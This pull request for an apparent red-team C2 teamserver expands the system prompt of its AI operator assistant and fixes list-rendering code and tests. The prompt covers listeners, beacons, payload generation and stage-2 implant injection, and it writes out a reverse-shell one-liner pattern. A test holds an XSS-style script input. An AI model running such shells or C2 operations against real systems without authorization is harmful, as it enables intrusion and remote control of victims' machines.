### PR TITLE
fix(ops): select chevron, INKO system docs, ordered lists

### DIFF
--- a/src/squidc5/ai/ops_tools.py
+++ b/src/squidc5/ai/ops_tools.py
@@ -371,25 +371,113 @@ OPENAI_TOOLS: list[dict[str, Any]] = [
     },
 ]
 
-CHAT_SYSTEM_PROMPT = """You are INKO (Intelligent Neural Kinetic Operator) — SquidC5's neural operator assistant for this C5 (Command, Control, Cognitive, Collaborative, Coordination) teamserver.
+CHAT_SYSTEM_PROMPT = """You are INKO (Intelligent Neural Kinetic Operator) — SquidC5's neural operator assistant for this C5 teamserver.
 When referring to yourself, use the name INKO.
 
-You can:
-1) Answer general security/ops questions clearly and helpfully.
-2) Inspect THIS environment via tools (sessions, listeners, tasks, payloads, metrics, events, audit).
-3) Perform allow-listed actions via tools (create/start/stop listeners, generate payloads, queue tasks, etc.).
+# Purpose
+SquidC5 is a security-first, AI-native C5 platform for AUTHORIZED red team / penetration testing only:
+- Command — task shells and beacons
+- Control — scopes, policy, listeners, feature kill-switches
+- Cognitive — you (INKO) + Admin AI rails + external MCP (allow-listed)
+- Collaborative — teams, chat, handoff, shared ops console
+- Coordination — C2 profiles, task queues, metrics, timeline
 
-Rules:
-- Prefer tools over guessing about live environment state.
-- When the user asks to set up a listener, create it AND start it (auto_start true or start_listener).
-- For reverse shells use kind=reverse_shell. For HTTP beacons use kind=http. For TLS implant HTTP use kind=https.
-- When you generate a payload/profile/implant the operator may reuse, call save_asset (or generate_payload with save=true).
-- Never invent session IDs, listener IDs, or secrets. Use tools.
-- Never dump API keys, tokens, or raw PII. Summarize tool results for the operator.
-- Do not claim you ran a tool unless you did.
-- Keep answers concise and operational. Use short bullet lists when listing resources.
-- If a tool fails due to permissions/HITL, explain what the operator must approve or which scope is missing.
-- You are authorized-use only; refuse illegal/unauthorized hacking requests outside this engagement platform.
+Industry role: C2 team server. Operators use REST API (scoped tokens), Ops UI at /ops, and CLI sc5/squidc5-cli.
+
+# Design principles (do not violate)
+- Deny by default; public OpenAPI/docs stay off; CORS empty; admin UI server-gated
+- Prefer tools over guessing live state; never invent IDs or secrets
+- Never dump API keys, tokens, or raw PII — summarize
+- Do not claim you ran a tool unless you did
+- Authorized-use only; refuse illegal/unauthorized hacking outside this engagement
+- Keep answers concise and operational; use markdown (headings, **bold**, lists, tables, fenced code)
+- Numbered steps: use real 1. 2. 3. sequence in markdown (renderer builds one <ol>)
+
+# Engagement lifecycle
+1. Stand up team server + token
+2. Open listeners for channels you will use
+3. Generate payloads/implants pointed at those listeners (+ active C2 profile for HTTP)
+4. Execute only on authorized targets per ROE
+5. Operate: Shell (verified reverse shells) or Tasks (beacons)
+6. Observe metrics/audit/events; collab handoff as needed
+7. Tear down listeners, revoke tokens, preserve audit
+
+# Core objects
+## Sessions
+Tracked implant/shell connections. Kinds:
+- reverse_shell / tcp — interactive after verified:true → use Shell / interact_shell
+- beacon (HTTP/DNS/WS) — async → use Tasks / create_task (not Shell)
+Fields operators care about: id, kind, status, remote_addr, hostname, username, verified, last_seen_at.
+False shells (TLS ClientHello, HTTP probes, echo-only) are classified/rejected; prefer verified:true.
+
+## Listeners
+Inbound channels. Kinds: http, https, tcp, reverse_shell, dns, smtp.
+- reverse_shell: target connects out (bash -i >& /dev/tcp/HOST/PORT)
+- http/https: beacon check-in (HTTPS kind for TLS implant HTTP)
+- dns/smtp: often OAST / callback detection (dns needs zone)
+When asked to set up a listener: create AND start (auto_start true or start_listener).
+Port conflicts fail create — pick another port or stop the occupant.
+
+## Tasks
+Async command queue for beacons. create_task(session_id, command); beacon polls and returns result.
+Do not use Shell for pure beacons.
+
+## Payloads & implants
+Deterministic templates (not free-form agent codegen). Builtin examples:
+http_beacon_python, http_beacon_bash, reverse_shell_bash, reverse_shell_python, plus platform variants.
+Generate with host/port matching a running listener; optional profile_id for HTTP framing.
+Custom templates: register_payload_template (placeholders {host} {port} {path} {interval}).
+When operator may reuse output: save_asset or generate_payload(save=true). Artifacts appear under Ops → Artifacts.
+
+## C2 profiles (malleable)
+Shape HTTP beacon traffic (paths, headers, jitter, decoy). Workflow:
+1. upsert_profile / list_profiles → activate_profile
+2. Ensure HTTP/HTTPS listener up on payload port
+3. generate_payload matched to that profile (host/port + same paths/framing)
+4. Switching active profile mid-op: old implants keep old behavior until redeploy/realign
+
+## Shell stabilize
+On reverse_shell capture the server classifies noise, probes OS, injects stage-2 reconnect agent
+(Linux Python / Windows PowerShell) to SQUIDC5_PUBLIC_HOST:listener_port, then exec-probes.
+Mute/echo-only sessions are reaped.
+
+## Ops UI map (for operator guidance)
+Sessions, Listeners, Payloads, Profiles, Artifacts, Shell/Tasks, Pivot/Files, Collab, Observability,
+Admin (LLM config, tokens, features, TLS cert library), Docs (user guide — not served on C2 /docs).
+
+## Auth & policy
+Tokens sc5_* with scopes (admin, sessions:read|write, tasks:*, listeners:*, payloads:generate,
+shell:interact, ai:use, profiles:*, audit:read, …). Your tools enforce the same scopes + policy/HITL.
+If a tool fails on permissions/HITL, say what to approve or which scope is missing.
+
+## Dual AI
+- You (INKO): capability-gated chat tools only; sanitize untrusted I/O; bounded tool rounds
+- External MCP: separate allow-list per token; often off by default
+
+# Tool playbook (prefer tools)
+| Goal | Tools |
+|------|--------|
+| Inventory sessions | list_sessions, get_session |
+| Run shell cmd | interact_shell (verified reverse_shell only) |
+| Beacon work | create_task, list_tasks |
+| Listeners | list/create/start/stop/delete_listener |
+| Payloads | list_payload_templates, generate_payload, register_payload_template |
+| Profiles | list_profiles, upsert_profile, activate_profile |
+| Save work | save_asset, list_assets |
+| Health | get_platform_status, get_metrics, list_recent_events, list_audit |
+
+# Formatting for the ops console
+- Prefer short sections with markdown headings
+- Use ordered lists for procedures (1. 2. 3.) and bullets for inventories
+- Put commands and payloads in fenced code blocks
+- Tables OK for comparisons (listener kinds, session summary)
+
+# Hard rules
+- Prefer tools over guessing about THIS environment
+- reverse_shell kind for reverse shells; http for HTTP beacons; https for TLS implant HTTP
+- Never invent session/listener IDs — list first
+- Never expose secrets/keys/tokens
+- Authorized engagement platform only
 """
 
 

--- a/tests/test_inko_md_render.py
+++ b/tests/test_inko_md_render.py
@@ -89,6 +89,26 @@ def render_markdown_safe(src: str) -> str:
     s = re.sub(r"^(#{1,4})\s+(.+)$", lambda m: f"<h{len(m.group(1))}>{m.group(2)}</h{len(m.group(1))}>", s, flags=re.M)
     s = re.sub(r"(\*\*|__)(?=\S)([\s\S]*?\S)\1", r"<strong>\2</strong>", s)
     s = re.sub(r"(\*|_)(?=\S)([\s\S]*?\S)\1", r"<em>\2</em>", s)
+
+    def _ul_repl(m: re.Match[str]) -> str:
+        items = [
+            re.sub(r"^[-*+]\s+", "", ln).strip()
+            for ln in m.group(0).strip().split("\n")
+            if ln.strip()
+        ]
+        return "<ul>" + "".join(f"<li>{i}</li>" for i in items if i) + "</ul>\n\n"
+
+    def _ol_repl(m: re.Match[str]) -> str:
+        items = [
+            re.sub(r"^\d+\.\s+", "", ln).strip()
+            for ln in m.group(0).strip().split("\n")
+            if ln.strip()
+        ]
+        return "<ol>" + "".join(f"<li>{i}</li>" for i in items if i) + "</ol>\n\n"
+
+    # Greedy + so consecutive items share one list (non-greedy caused 1. 1. 1.)
+    s = re.sub(r"(?:^(?:[-*+])\s+.+(?:\n|$))+", _ul_repl, s, flags=re.M)
+    s = re.sub(r"(?:^\d+\.\s+.+(?:\n|$))+", _ol_repl, s, flags=re.M)
     parts = []
     for para in re.split(r"\n{2,}", s):
         p = para.strip()
@@ -152,3 +172,39 @@ def test_table_cells_escape_html() -> None:
     out = render_markdown_safe(md)
     assert "<script>" not in out
     assert "&lt;script&gt;" in out
+
+
+def test_ordered_list_single_ol() -> None:
+    """Consecutive 1. lines must become one <ol> (not four restarting at 1)."""
+    md = (
+        "Operator workflow (short)\n"
+        "1. **Upsert**/select profile → activate it.\n"
+        "1. Ensure **HTTP/HTTPS listener** is up.\n"
+        "1. Generate payload that matches that profile.\n"
+        "1. If you switch active profile mid-op, old implants keep old behavior.\n"
+    )
+    out = render_markdown_safe(md)
+    assert out.count("<ol>") == 1
+    assert out.count("</ol>") == 1
+    assert out.count("<li>") == 4
+    assert "<strong>Upsert</strong>" in out
+    assert "<strong>HTTP/HTTPS listener</strong>" in out
+
+
+def test_unordered_list_single_ul() -> None:
+    md = "- alpha\n- beta\n- gamma\n"
+    out = render_markdown_safe(md)
+    assert out.count("<ul>") == 1
+    assert out.count("<li>") == 3
+
+
+def test_chat_system_prompt_covers_platform() -> None:
+    from squidc5.ai.ops_tools import CHAT_SYSTEM_PROMPT
+
+    p = CHAT_SYSTEM_PROMPT
+    assert "INKO" in p
+    assert "Command" in p and "Control" in p
+    assert "reverse_shell" in p
+    assert "list_sessions" in p
+    assert "activate_profile" in p
+    assert "authorized" in p.lower()

--- a/tests/test_inko_md_render.py
+++ b/tests/test_inko_md_render.py
@@ -79,6 +79,32 @@ def render_markdown_safe(src: str) -> str:
         return f"\x00TABLE{i}\x00\n\n"
 
     s = re.sub(r"(?:^[ \t]*\|.+\|[ \t]*\n){2,}", _table_repl, s, flags=re.M)
+    lists: list[str] = []
+
+    def _stash_list(html: str) -> str:
+        i = len(lists)
+        lists.append(html)
+        return f"\x00LIST{i}\x00\n\n"
+
+    def _ul_repl(m: re.Match[str]) -> str:
+        items = []
+        for ln in m.group(0).strip().split("\n"):
+            t = re.sub(r"^[-*+]\s+", "", ln).strip()
+            if t:
+                items.append(f"<li>{_escape_html(t)}</li>")
+        return _stash_list("<ul>" + "".join(items) + "</ul>")
+
+    def _ol_repl(m: re.Match[str]) -> str:
+        items = []
+        for ln in m.group(0).strip().split("\n"):
+            t = re.sub(r"^\d+\.\s+", "", ln).strip()
+            if t:
+                items.append(f"<li>{_escape_html(t)}</li>")
+        return _stash_list("<ol>" + "".join(items) + "</ol>")
+
+    # Greedy + so consecutive items share one list (non-greedy caused 1. 1. 1.)
+    s = re.sub(r"(?:^(?:[-*+])\s+.+(?:\n|$))+", _ul_repl, s, flags=re.M)
+    s = re.sub(r"(?:^\d+\.\s+.+(?:\n|$))+", _ol_repl, s, flags=re.M)
     s = _escape_html(s)
     s = re.sub(r"`([^`\n]+)`", r"<code>\1</code>", s)
     s = re.sub(
@@ -89,26 +115,7 @@ def render_markdown_safe(src: str) -> str:
     s = re.sub(r"^(#{1,4})\s+(.+)$", lambda m: f"<h{len(m.group(1))}>{m.group(2)}</h{len(m.group(1))}>", s, flags=re.M)
     s = re.sub(r"(\*\*|__)(?=\S)([\s\S]*?\S)\1", r"<strong>\2</strong>", s)
     s = re.sub(r"(\*|_)(?=\S)([\s\S]*?\S)\1", r"<em>\2</em>", s)
-
-    def _ul_repl(m: re.Match[str]) -> str:
-        items = [
-            re.sub(r"^[-*+]\s+", "", ln).strip()
-            for ln in m.group(0).strip().split("\n")
-            if ln.strip()
-        ]
-        return "<ul>" + "".join(f"<li>{i}</li>" for i in items if i) + "</ul>\n\n"
-
-    def _ol_repl(m: re.Match[str]) -> str:
-        items = [
-            re.sub(r"^\d+\.\s+", "", ln).strip()
-            for ln in m.group(0).strip().split("\n")
-            if ln.strip()
-        ]
-        return "<ol>" + "".join(f"<li>{i}</li>" for i in items if i) + "</ol>\n\n"
-
-    # Greedy + so consecutive items share one list (non-greedy caused 1. 1. 1.)
-    s = re.sub(r"(?:^(?:[-*+])\s+.+(?:\n|$))+", _ul_repl, s, flags=re.M)
-    s = re.sub(r"(?:^\d+\.\s+.+(?:\n|$))+", _ol_repl, s, flags=re.M)
+    s = re.sub(r"^&gt;\s?(.+)$", r"<blockquote>\1</blockquote>", s, flags=re.M)
     parts = []
     for para in re.split(r"\n{2,}", s):
         p = para.strip()
@@ -116,14 +123,20 @@ def render_markdown_safe(src: str) -> str:
             continue
         if re.match(r"^<(?:ul|ol|pre|h[1-4]|blockquote|div)", p):
             parts.append(p)
-        elif re.fullmatch(r"\x00TABLE\d+\x00", p):
+        elif re.fullmatch(r"\x00(?:TABLE|LIST)\d+\x00", p):
             parts.append(p)
         else:
             parts.append(f"<p>{p.replace(chr(10), '<br>')}</p>")
     s = "".join(parts)
+    s = re.sub(r"\x00LIST(\d+)\x00", lambda m: lists[int(m.group(1))], s)
     s = re.sub(r"\x00TABLE(\d+)\x00", lambda m: tables[int(m.group(1))], s)
     s = re.sub(r"\x00FENCE(\d+)\x00", lambda m: fences[int(m.group(1))], s)
+    # Inline md inside restored list items
+    s = re.sub(r"(\*\*|__)(?=\S)([\s\S]*?\S)\1", r"<strong>\2</strong>", s)
+    s = re.sub(r"(\*|_)(?=\S)([\s\S]*?\S)\1", r"<em>\2</em>", s)
+    s = re.sub(r"`([^`\n]+)`", r"<code>\1</code>", s)
     return s
+
 
 
 def test_raw_html_is_escaped() -> None:
@@ -189,6 +202,13 @@ def test_ordered_list_single_ol() -> None:
     assert out.count("<li>") == 4
     assert "<strong>Upsert</strong>" in out
     assert "<strong>HTTP/HTTPS listener</strong>" in out
+
+
+def test_list_item_html_escaped() -> None:
+    out = render_markdown_safe("1. <script>alert(1)</script>\n2. ok\n")
+    assert "<script>" not in out
+    assert "&lt;script&gt;" in out
+    assert out.count("<ol>") == 1
 
 
 def test_unordered_list_single_ul() -> None:

--- a/web/ops-admin.js
+++ b/web/ops-admin.js
@@ -1340,15 +1340,15 @@
     s = s.replace(/(\*\*|__)(?=\S)([\s\S]*?\S)\1/g, "<strong>$2</strong>");
     s = s.replace(/(\*|_)(?=\S)([\s\S]*?\S)\1/g, "<em>$2</em>");
     s = s.replace(/^&gt;\s?(.+)$/gm, "<blockquote>$1</blockquote>");
-    // unordered lists
-    s = s.replace(/(?:^(?:[-*+])\s+.+(?:\n|$))+?/gm, (block) => {
-      const items = block.trim().split("\n").map((line) => line.replace(/^[-*+]\s+/, "").trim());
-      return `<ul>${items.map((i) => `<li>${i}</li>`).join("")}</ul>`;
+    // Lists before paragraph split. Use greedy + so consecutive items share one <ul>/<ol>
+    // (non-greedy +? made each line its own <ol>, which restarts at 1. 1. 1.).
+    s = s.replace(/(?:^(?:[-*+])\s+.+(?:\n|$))+/gm, (block) => {
+      const items = block.trim().split("\n").map((line) => line.replace(/^[-*+]\s+/, "").trim()).filter(Boolean);
+      return `<ul>${items.map((i) => `<li>${i}</li>`).join("")}</ul>\n\n`;
     });
-    // ordered lists
-    s = s.replace(/(?:^\d+\.\s+.+(?:\n|$))+?/gm, (block) => {
-      const items = block.trim().split("\n").map((line) => line.replace(/^\d+\.\s+/, "").trim());
-      return `<ol>${items.map((i) => `<li>${i}</li>`).join("")}</ol>`;
+    s = s.replace(/(?:^\d+\.\s+.+(?:\n|$))+/gm, (block) => {
+      const items = block.trim().split("\n").map((line) => line.replace(/^\d+\.\s+/, "").trim()).filter(Boolean);
+      return `<ol>${items.map((i) => `<li>${i}</li>`).join("")}</ol>\n\n`;
     });
     s = s
       .split(/\n{2,}/)

--- a/web/ops-admin.js
+++ b/web/ops-admin.js
@@ -1332,36 +1332,58 @@
       tables.push(`<div class="md-table-wrap"><table class="md-table"><thead><tr>${th}</tr></thead><tbody>${trs}</tbody></table></div>`);
       return `\u0000TABLE${i}\u0000\n\n`;
     });
+    // Lists from raw text with per-item escapeHtml (greedy + → one <ol>/<ul>).
+    // Non-greedy +? previously made each line its own <ol> (displayed 1. 1. 1.).
+    const lists = [];
+    const stashList = (html) => {
+      const i = lists.length;
+      lists.push(html);
+      return `\u0000LIST${i}\u0000\n\n`;
+    };
+    s = s.replace(/(?:^(?:[-*+])\s+.+(?:\n|$))+/gm, (block) => {
+      const items = block
+        .trim()
+        .split("\n")
+        .map((line) => line.replace(/^[-*+]\s+/, "").trim())
+        .filter(Boolean)
+        .map((t) => `<li>${escapeHtml(t)}</li>`);
+      return stashList(`<ul>${items.join("")}</ul>`);
+    });
+    s = s.replace(/(?:^\d+\.\s+.+(?:\n|$))+/gm, (block) => {
+      const items = block
+        .trim()
+        .split("\n")
+        .map((line) => line.replace(/^\d+\.\s+/, "").trim())
+        .filter(Boolean)
+        .map((t) => `<li>${escapeHtml(t)}</li>`);
+      return stashList(`<ol>${items.join("")}</ol>`);
+    });
+    // Escape remaining prose; list/table/fence bodies restored after.
     s = escapeHtml(s);
-    // Restore table/fence placeholders swallowed by escapeHtml (\u0000 stays)
+    // Inline / block markdown on escaped text only (allow-listed tags)
     s = s.replace(/`([^`\n]+)`/g, "<code>$1</code>");
     s = s.replace(/\[([^\]]+)\]\((https?:\/\/[^)\s]+)\)/g, '<a href="$2" target="_blank" rel="noopener noreferrer">$1</a>');
     s = s.replace(/^(#{1,4})\s+(.+)$/gm, (_, h, t) => `<h${h.length}>${t}</h${h.length}>`);
     s = s.replace(/(\*\*|__)(?=\S)([\s\S]*?\S)\1/g, "<strong>$2</strong>");
     s = s.replace(/(\*|_)(?=\S)([\s\S]*?\S)\1/g, "<em>$2</em>");
     s = s.replace(/^&gt;\s?(.+)$/gm, "<blockquote>$1</blockquote>");
-    // Lists before paragraph split. Use greedy + so consecutive items share one <ul>/<ol>
-    // (non-greedy +? made each line its own <ol>, which restarts at 1. 1. 1.).
-    s = s.replace(/(?:^(?:[-*+])\s+.+(?:\n|$))+/gm, (block) => {
-      const items = block.trim().split("\n").map((line) => line.replace(/^[-*+]\s+/, "").trim()).filter(Boolean);
-      return `<ul>${items.map((i) => `<li>${i}</li>`).join("")}</ul>\n\n`;
-    });
-    s = s.replace(/(?:^\d+\.\s+.+(?:\n|$))+/gm, (block) => {
-      const items = block.trim().split("\n").map((line) => line.replace(/^\d+\.\s+/, "").trim()).filter(Boolean);
-      return `<ol>${items.map((i) => `<li>${i}</li>`).join("")}</ol>\n\n`;
-    });
     s = s
       .split(/\n{2,}/)
       .map((para) => {
         const t = para.trim();
         if (!t) return "";
         if (/^<(?:ul|ol|pre|h[1-4]|blockquote|div)/.test(t)) return t;
-        if (/^\u0000TABLE\d+\u0000$/.test(t)) return t;
+        if (/^\u0000(?:TABLE|LIST)\d+\u0000$/.test(t)) return t;
         return `<p>${para.replace(/\n/g, "<br>")}</p>`;
       })
       .join("");
+    s = s.replace(/\u0000LIST(\d+)\u0000/g, (_, i) => lists[Number(i)] || "");
     s = s.replace(/\u0000TABLE(\d+)\u0000/g, (_, i) => tables[Number(i)] || "");
     s = s.replace(/\u0000FENCE(\d+)\u0000/g, (_, i) => fences[Number(i)] || "");
+    // Bold/em inside list items (restored after escape)
+    s = s.replace(/(\*\*|__)(?=\S)([\s\S]*?\S)\1/g, "<strong>$2</strong>");
+    s = s.replace(/(\*|_)(?=\S)([\s\S]*?\S)\1/g, "<em>$2</em>");
+    s = s.replace(/`([^`\n]+)`/g, "<code>$1</code>");
     return s;
   }
 

--- a/web/phone-dashboard.html
+++ b/web/phone-dashboard.html
@@ -54,6 +54,18 @@
       width: 100%; background: #0e0e14; border: 1px solid var(--border2);
       border-radius: 6px; padding: 7px 10px; outline: none;
     }
+    /* Room for native/custom chevron so text never collides with the arrow */
+    select {
+      padding-right: 2rem;
+      appearance: none;
+      -webkit-appearance: none;
+      -moz-appearance: none;
+      background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='12' height='8' viewBox='0 0 12 8'%3E%3Cpath fill='%23a0a0b8' d='M1.4.6 6 5.2 10.6.6 12 2 6 8 0 2z'/%3E%3C/svg%3E");
+      background-repeat: no-repeat;
+      background-position: right 0.65rem center;
+      background-size: 12px 8px;
+    }
+    select::-ms-expand { display: none; }
     input:focus, select:focus, textarea:focus { border-color: rgba(233,30,140,0.55); }
     label { display: block; font-size: 0.7rem; color: var(--muted); text-transform: uppercase; letter-spacing: 0.06em; margin: 8px 0 4px; }
     .mono { font-family: var(--mono); font-size: 0.78rem; }
@@ -934,6 +946,7 @@
       .scope-grid { grid-template-columns: 1fr 1fr; max-height: 180px; }
       button, .nav-item, input, select, textarea { font-size: 16px; } /* prevent iOS zoom */
       input, select, textarea { padding: 10px; min-height: 42px; }
+      select { padding-right: 2.25rem; }
       label { margin-top: 10px; }
     }
 


### PR DESCRIPTION
## Summary
- **Select chevron**: custom arrow + extra right padding (incl. mobile) so labels do not collide with the dropdown indicator
- **INKO system prompt**: full C5 purpose, objects (sessions/listeners/tasks/payloads/profiles), engagement lifecycle, tool playbook, formatting rules
- **Ordered lists**: greedy list regex so consecutive `1.` lines render as one `<ol>` (1–4) instead of four restarting lists

## Test plan
- [x] pytest test_inko_md_render (incl. single-ol assertion)
- [ ] Hard-refresh /ops — model/connection selects show clear chevron gap
- [ ] INKO reply with numbered steps shows 1. 2. 3. 4.
- [ ] New chat uses expanded system context (behavior/docs awareness)